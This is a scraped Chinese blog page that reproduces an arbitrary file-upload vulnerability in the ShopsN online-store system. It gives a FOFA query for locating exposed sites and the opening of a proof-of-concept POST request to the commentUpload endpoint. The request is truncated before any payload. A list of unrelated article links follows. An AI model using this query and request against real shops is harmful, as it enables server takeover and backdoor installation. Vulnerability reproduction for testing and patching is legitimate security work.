当前位置: 首页 > news >正文

ShopsN commentUpload 文件上传漏洞复现

news 2025/7/15 6:38:52

0x01 产品简介

ShopsN 是一款符合企业级商用标准全功能的真正允许免费商业用途的开源网店全网系统。

0x02 漏洞概述

ShopsN commentUpload 接口处存在任意文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。

0x03 复现环境

FOFA:

title="上海盈赛电子商务有限公司" || body="/Supermarket/ProductList" || body="/Uploads/conf/supermarket" || body="/Uploads/intnet/"

0x04 漏洞复现 

PoC

POST /index.php/Home/AppUpload/commentUpload HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqfmeYTXFKSA3F97e
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15------WebKitFormBoundaryqfmeYTXFKSA3F97e
Content-Disposition: form-da
http://www.lryc.cn/news/260703.html

相关文章:

  • 【Qt5】ui文件最后会变成头文件
  • 数组笔试题解析(下)
  • PPT插件-好用的插件-图形缩放-大珩助手
  • 五:爬虫-数据解析之xpath解析
  • 什么是Laravel?它有哪些特性?
  • [足式机器人]Part2 Dr. CAN学习笔记-自动控制原理Ch1-3燃烧卡路里-系统分析实例
  • 安恒明御安全网关 aaa_local_web_preview文件上传漏洞复现
  • 基于ssm企业人事管理系统的设计与实现论文
  • 你知道为什么要加 final 关键字了吗?
  • 找不到mfc100u.dll,程序无法继续执行?三步即可搞定
  • postman接口测试之Postman配置环境变量和全局变量
  • OpenSSL 编程示例
  • K8S学习指南(17)-k8s核心对象CronJob
  • 单片机Freertos入门(二)任务调度的介绍
  • QT----自定义信号和槽
  • 【Vue第4章】Vue中的ajax_Vue2
  • 力扣labuladong——一刷day72
  • Leetcode—509.斐波那契数【简单】
  • 山峰个数 - 华为OD统一考试
  • 38、池化的特征不变性
  • 051:vue项目webpack打包后查看各个文件大小
  • JVM调优:参数(学习笔记)
  • MVC Gantt Wrapper:RadiantQ jQuery
  • 2019年第八届数学建模国际赛小美赛C题预测通过拥堵路段所需的时间解题全过程文档及程序
  • 天干地支。
  • RabbitMQ插件详解:rabbitmq_web_stomp【RabbitMQ 六】
  • 路由器的转换原理--ENSP实验
  • 世界5G大会
  • FFmpeg-基础组件-AVFrame
  • Vue 组件传参 emit